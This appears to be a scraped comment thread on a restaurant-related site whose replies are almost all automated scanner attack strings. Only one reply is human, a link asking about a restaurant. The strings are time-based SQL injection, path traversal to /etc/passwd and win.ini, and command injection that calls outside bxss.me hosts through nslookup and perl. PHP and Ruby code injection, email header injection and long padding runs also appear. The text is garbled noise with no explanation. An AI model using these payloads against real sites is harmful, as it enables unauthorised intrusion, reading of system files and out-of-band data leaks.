(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
re: Justeat
-1; waitfor delay '0:0:15' --
re: Justeat
-1); waitfor delay '0:0:15' --
re: Justeat
1 waitfor delay '0:0:15' --
re: Justeat
SuNFZNMh'; waitfor delay '0:0:15' --
re: Justeat
-5 OR 801=(SELECT 801 FROM PG_SLEEP(15))--
re: Justeat
-5) OR 791=(SELECT 791 FROM PG_SLEEP(15))--
re: Justeat
-1)) OR 468=(SELECT 468 FROM PG_SLEEP(15))--
re: Justeat
9cwILvEh' OR 507=(SELECT 507 FROM PG_SLEEP(15))--
re: Justeat
d9B7TebO') OR 33=(SELECT 33 FROM PG_SLEEP(15))--
re: Justeat
vL29apeR')) OR 280=(SELECT 280 FROM PG_SLEEP(15))--
re: Justeat
*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
re: Justeat
'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
re: Justeat
'||(select 1 from (select pg_sleep(15))x)||'
re: Justeat
''||(select 1 from (select pg_sleep(15))x)||''
re: Justeat
1'"
re: Justeat
@@3NogB
re: Justeat
aT1lBaE1
re: Justeat
1*
re: Justeat
1*
re: Justeat
1*
re: Justeat
1*
re: Justeat
-1 OR 2+560-560-1=0+0+0+1
re: Justeat
-1 OR 3+560-560-1=0+0+0+1
re: Justeat
if(now()=sysdate(),sleep(15),0)
re: Justeat
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
re: Justeat
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
re: Justeat
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
re: Justeat
-1; waitfor delay '0:0:15' --
re: Justeat
-1); waitfor delay '0:0:15' --
re: Justeat
1 waitfor delay '0:0:15' --
re: Justeat
wxFg0Crk'; waitfor delay '0:0:15' --
re: Justeat
-5 OR 84=(SELECT 84 FROM PG_SLEEP(15))--
re: Justeat
-5) OR 660=(SELECT 660 FROM PG_SLEEP(15))--
re: Justeat
-1)) OR 608=(SELECT 608 FROM PG_SLEEP(15))--
re: Justeat
Mc2926fA' OR 424=(SELECT 424 FROM PG_SLEEP(15))--
re: Justeat
5Op4XhOn') OR 271=(SELECT 271 FROM PG_SLEEP(15))--
re: Justeat
KPMdujLn')) OR 61=(SELECT 61 FROM PG_SLEEP(15))--
re: Justeat
*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
re: Justeat
'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
re: Justeat
'||(select 1 from (select pg_sleep(15))x)||'
re: Justeat
''||(select 1 from (select pg_sleep(15))x)||''
re: Justeat
1'"
re: Justeat
@@mwFYA
re: Justeat
1L5YsDQcO
re: Justeat
response.write(9095352*9273221)
re: Justeat
%0abcc:074625.67-10138.67.a3576.19990.2@bxss.me
re: Justeat
'+response.write(9095352*9273221)+'
re: Justeat
to@example.com>%0d%0abcc:074625.67-10139.67.a3576.19990.2@bxss.me
re: Justeat
"+response.write(9095352*9273221)+"
re: Justeat
../../../../../../../../../../../../../../etc/passwd
re: Justeat
<esi:include src="http://bxss.me/rpb.png"/>
re: Justeat
../../../../../../../../../../../../../../windows/win.ini
re: Justeat
${9999381+10000375}
re: Justeat
file:///etc/passwd
re: Justeat
../../../../../../../../../../../../../../../proc/version
re: Justeat
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd
re: Justeat
../../../../../../../../../../etc/passwd%00.jpg
re: Justeat
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg
re: Justeat
/../..//../..//../..//../..//../..//etc/passwd%00.jpg
re: Justeat
.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd
re: Justeat
)
re: Justeat
/etc/passwd
re: Justeat
!(()&&!|*|*|
re: Justeat
%2fetc%2fpasswd
re: Justeat
echo ahsbum$()\ xprlbw\nz^xyu||a #' &echo ahsbum$()\ xprlbw\nz^xyu||a #|" &echo ahsbum$()\ xprlbw\nz^xyu||a #
re: Justeat
^(#$!@#$)(()))******
re: Justeat
/.././.././.././.././.././.././.././../etc/./passwd%00
re: Justeat
&echo bccpgg$()\ icmgsm\nz^xyu||a #' &echo bccpgg$()\ icmgsm\nz^xyu||a #|" &echo bccpgg$()\ icmgsm\nz^xyu||a #
re: Justeat
../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd
re: Justeat
|echo sjgojf$()\ bsloes\nz^xyu||a #' |echo sjgojf$()\ bsloes\nz^xyu||a #|" |echo sjgojf$()\ bsloes\nz^xyu||a #
re: Justeat
../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd
re: Justeat
(nslookup hitjaqjygsagd8163f.bxss.me||perl -e "gethostbyname('hitjaqjygsagd8163f.bxss.me')")
re: Justeat
../././../././../././../././../././../././../././../././../././../././etc/passwd
re: Justeat
$(nslookup hitnfewpcpimzdbd75.bxss.me||perl -e "gethostbyname('hitnfewpcpimzdbd75.bxss.me')")
re: Justeat
..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afetc/passwd
re: Justeat
&nslookup hitgoeljwkorqcd80c.bxss.me&'\"`0&nslookup hitgoeljwkorqcd80c.bxss.me&`'
re: Justeat
'.gethostbyname(lc('hityx'.'yyicyuak0de22.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(120).chr(77).chr(120).chr(73).'
re: Justeat
invalid../../../../../../../../../../etc/passwd/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.
re: Justeat
&(nslookup hitdteeygxpicc975e.bxss.me||perl -e "gethostbyname('hitdteeygxpicc975e.bxss.me')")&'\"`0&(nslookup hitdteeygxpicc975e.bxss.me||perl -e "gethostbyname('hitdteeygxpicc975e.bxss.me')")&`'
re: Justeat
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%3F.jpg
re: Justeat
".gethostbyname(lc("hitmz"."xkdtgyrb75283.bxss.me."))."A".chr(67).chr(hex("58")).chr(118).chr(86).chr(110).chr(74)."
re: Justeat
file:///etc/passwd
re: Justeat
1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%00.jpg
re: Justeat
|(nslookup hithsjlbzdklyb8d2a.bxss.me||perl -e "gethostbyname('hithsjlbzdklyb8d2a.bxss.me')")
re: Justeat
/\../\../\../\../\../\../\../etc/passwd
re: Justeat
Http://bxss.me/t/fit.txt
re: Justeat
`(nslookup hitdlikwyxotgeec52.bxss.me||perl -e "gethostbyname('hitdlikwyxotgeec52.bxss.me')")`
re: Justeat
/WEB-INF/web.xml
re: Justeat
http://bxss.me/t/fit.txt%3F.jpg
re: Justeat
;(nslookup hitluhcjdbkdfa77b8.bxss.me||perl -e "gethostbyname('hitluhcjdbkdfa77b8.bxss.me')")|(nslookup hitluhcjdbkdfa77b8.bxss.me||perl -e "gethostbyname('hitluhcjdbkdfa77b8.bxss.me')")&(nslookup hitluhcjdbkdfa77b8.bxss.me||perl -e "gethostbyname('hitluhcjdbkdfa77b8.bxss.me')")
re: Justeat
C:\WINDOWS\system32\drivers\etc\hosts
re: Justeat
/etc/shells
re: Justeat
../../../../../../../../../../windows/win.ini%00.jpg
re: Justeat
c:/windows/win.ini
re: Justeat
/../../../../../../../../../../boot.ini
re: Justeat
bxss.me
re: Justeat
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%afwindows%c0%afwin.ini
re: Justeat
HttP://bxss.me/t/xss.html?%00
re: Justeat
..\..\..\..\..\..\..\..\windows\win.ini
re: Justeat
bxss.me/t/xss.html?%00
re: Justeat
"+"A".concat(70-3).concat(22*4).concat(102).concat(80).concat(119).concat(80)+(require"socket"
Socket.gethostbyname("hitpf"+"qoxxljseac16b.bxss.me.")[3].to_s)+"
re: Justeat
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini
re: Justeat
'+'A'.concat(70-3).concat(22*4).concat(108).concat(73).concat(110).concat(75)+(require'socket'
Socket.gethostbyname('hiter'+'mcqaymbg89433.bxss.me.')[3].to_s)+'
re: Justeat
/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini
re: Justeat
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
re: Justeat
../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini
re: Justeat
';print(md5(31337));$a='
re: Justeat
)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
re: Justeat
../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini
re: Justeat
";print(md5(31337));$a="
re: Justeat
unexisting/../../../../../../../../../../windows/win.ini.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\
re: Justeat
${@print(md5(31337))}
re: Justeat
WEB-INF/web.xml
re: Justeat
${@print(md5(31337))}\
re: Justeat
'"
re: Justeat
WEB-INF\web.xml
re: Justeat
'.print(md5(31337)).'
re: Justeat
<!--
re: Justeat
1
re: Justeat
1
re: Justeat
-1 OR 2+23-23-1=0+0+0+1 --
re: Justeat
-1 OR 3+23-23-1=0+0+0+1 --
re: Justeat
-1 OR 2+691-691-1=0+0+0+1
re: Justeat
-1 OR 3+691-691-1=0+0+0+1
re: Justeat
-1' OR 2+468-468-1=0+0+0+1 --
re: Justeat
-1' OR 3+468-468-1=0+0+0+1 --
re: Justeat
-1' OR 2+174-174-1=0+0+0+1 or 'gdaDOJub'='
re: Justeat
-1' OR 3+174-174-1=0+0+0+1 or 'gdaDOJub'='
re: Justeat
-1" OR 2+311-311-1=0+0+0+1 --
re: Justeat
-1" OR 3+311-311-1=0+0+0+1 --
re: Justeat
if(now()=sysdate(),sleep(15),0)
re: Justeat
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
re: Justeat
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
re: Justeat
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
re: Justeat
-1; waitfor delay '0:0:15' --
re: Justeat
-1); waitfor delay '0:0:15' --
re: Justeat
1 waitfor delay '0:0:15' --
re: Justeat
AxXcBu3R'; waitfor delay '0:0:15' --
re: Justeat
-5 OR 257=(SELECT 257 FROM PG_SLEEP(15))--
re: Justeat
-5) OR 431=(SELECT 431 FROM PG_SLEEP(15))--
re: Justeat
-1)) OR 808=(SELECT 808 FROM PG_SLEEP(15))--
re: Justeat
U4CeYX5Z' OR 246=(SELECT 246 FROM PG_SLEEP(15))--
re: Justeat
ApQwxvZd') OR 363=(SELECT 363 FROM PG_SLEEP(15))--
re: Justeat
BpGli8TG')) OR 10=(SELECT 10 FROM PG_SLEEP(15))--
re: Justeat
1*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
re: Justeat
1'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
re: Justeat
'||(select 1 from (select pg_sleep(15))x)||'
re: Justeat
''||(select 1 from (select pg_sleep(15))x)||''
re: Justeat
1'"
re: Justeat
@@LfyhH
re: Justeat
1
re: Justeat
1
re: Justeat
1
Is this the Kippei you're referring to?
https://tokyotabletrip.com/en/418
re: Shi
TrLVDYs9
re: Shi
1*
re: Shi
1*
re: Shi
1*
re: Shi
1*
re: Shi
-1 OR 2+921-921-1=0+0+0+1
re: Shi
-1 OR 3+921-921-1=0+0+0+1
re: Shi
if(now()=sysdate(),sleep(15),0)
re: Shi
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
re: Shi
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
re: Shi
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
re: Shi
-1; waitfor delay '0:0:15' --
re: Shi
-1); waitfor delay '0:0:15' --
re: Shi
1 waitfor delay '0:0:15' --
re: Shi
Bgbc8P1w'; waitfor delay '0:0:15' --
re: Shi
-5 OR 885=(SELECT 885 FROM PG_SLEEP(15))--
re: Shi
-5) OR 351=(SELECT 351 FROM PG_SLEEP(15))--
re: Shi
-1)) OR 773=(SELECT 773 FROM PG_SLEEP(15))--
re: Shi
eVPjTQp7' OR 658=(SELECT 658 FROM PG_SLEEP(15))--
re: Shi
yKbzichO') OR 182=(SELECT 182 FROM PG_SLEEP(15))--
re: Shi
JRz7Isye')) OR 180=(SELECT 180 FROM PG_SLEEP(15))--
re: Shi
*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
re: Shi
'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
re: Shi
'||(select 1 from (select pg_sleep(15))x)||'
re: Shi
''||(select 1 from (select pg_sleep(15))x)||''
re: Shi
1'"
re: Shi
@@9ihfx
re: Shi
NoLqYQYX
re: Shi
1*
re: Shi
1*
re: Shi
1*
re: Shi
1*
re: Shi
-1 OR 2+946-946-1=0+0+0+1
re: Shi
-1 OR 3+946-946-1=0+0+0+1
re: Shi
if(now()=sysdate(),sleep(15),0)
re: Shi
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
re: Shi
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
re: Shi
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
re: Shi
-1; waitfor delay '0:0:15' --
re: Shi
-1); waitfor delay '0:0:15' --
re: Shi
1 waitfor delay '0:0:15' --
re: Shi
KkY3O8fK'; waitfor delay '0:0:15' --
re: Shi
-5 OR 801=(SELECT 801 FROM PG_SLEEP(15))--
re: Shi
-5) OR 203=(SELECT 203 FROM PG_SLEEP(15))--
re: Shi
-1)) OR 788=(SELECT 788 FROM PG_SLEEP(15))--
re: Shi
XBLEIpG4' OR 383=(SELECT 383 FROM PG_SLEEP(15))--
re: Shi
YoXXea8h') OR 822=(SELECT 822 FROM PG_SLEEP(15))--
re: Shi
y3WZg928')) OR 888=(SELECT 888 FROM PG_SLEEP(15))--
re: Shi
*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
re: Shi
'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
re: Shi
'||(select 1 from (select pg_sleep(15))x)||'
re: Shi
''||(select 1 from (select pg_sleep(15))x)||''
re: Shi
1'"
re: Shi
@@SrIwv
re: Shi
1VXlanb2O
re: Shi
response.write(9654283*9690531)
re: Shi
'+response.write(9654283*9690531)+'
re: Shi
"+response.write(9654283*9690531)+"
re: Shi
%0abcc:074625.67-10126.67.37d6c.19990.2@bxss.me
re: Shi
to@example.com>%0d%0abcc:074625.67-10127.67.37d6c.19990.2@bxss.me
re: Shi
<esi:include src="http://bxss.me/rpb.png"/>
re: Shi
../../../../../../../../../../../../../../etc/passwd
re: Shi
../../../../../../../../../../../../../../windows/win.ini
re: Shi
${10000127+10000189}
re: Shi
file:///etc/passwd
re: Shi
../../../../../../../../../../../../../../../proc/version
re: Shi
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd
re: Shi
../../../../../../../../../../etc/passwd%00.jpg
re: Shi
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg
re: Shi
echo igrwjz$()\ tghafm\nz^xyu||a #' &echo igrwjz$()\ tghafm\nz^xyu||a #|" &echo igrwjz$()\ tghafm\nz^xyu||a #
re: Shi
/../..//../..//../..//../..//../..//etc/passwd%00.jpg
re: Shi
&echo vtexij$()\ ciurhb\nz^xyu||a #' &echo vtexij$()\ ciurhb\nz^xyu||a #|" &echo vtexij$()\ ciurhb\nz^xyu||a #
re: Shi
.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd
re: Shi
)
re: Shi
|echo wwakwh$()\ tywoxa\nz^xyu||a #' |echo wwakwh$()\ tywoxa\nz^xyu||a #|" |echo wwakwh$()\ tywoxa\nz^xyu||a #
re: Shi
/etc/passwd
re: Shi
!(()&&!|*|*|
re: Shi
(nslookup hitksslmnrnok2afe2.bxss.me||perl -e "gethostbyname('hitksslmnrnok2afe2.bxss.me')")
re: Shi
%2fetc%2fpasswd
re: Shi
^(#$!@#$)(()))******
re: Shi
$(nslookup hitqxselwmvbt66591.bxss.me||perl -e "gethostbyname('hitqxselwmvbt66591.bxss.me')")
re: Shi
/.././.././.././.././.././.././.././../etc/./passwd%00
re: Shi
&nslookup hitcxqgogtiauc6978.bxss.me&'\"`0&nslookup hitcxqgogtiauc6978.bxss.me&`'
re: Shi
../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd
re: Shi
&(nslookup hithluhbwgqlpaa86e.bxss.me||perl -e "gethostbyname('hithluhbwgqlpaa86e.bxss.me')")&'\"`0&(nslookup hithluhbwgqlpaa86e.bxss.me||perl -e "gethostbyname('hithluhbwgqlpaa86e.bxss.me')")&`'
re: Shi
../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd
re: Shi
|(nslookup hitwvybskyzll9e486.bxss.me||perl -e "gethostbyname('hitwvybskyzll9e486.bxss.me')")
re: Shi
../././../././../././../././../././../././../././../././../././../././etc/passwd
re: Shi
..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afetc/passwd
re: Shi
`(nslookup hitmamzvzrlmxc261a.bxss.me||perl -e "gethostbyname('hitmamzvzrlmxc261a.bxss.me')")`
re: Shi
'.gethostbyname(lc('hitlg'.'apcghvytd7878.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(116).chr(76).chr(119).chr(87).'
re: Shi
invalid../../../../../../../../../../etc/passwd/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.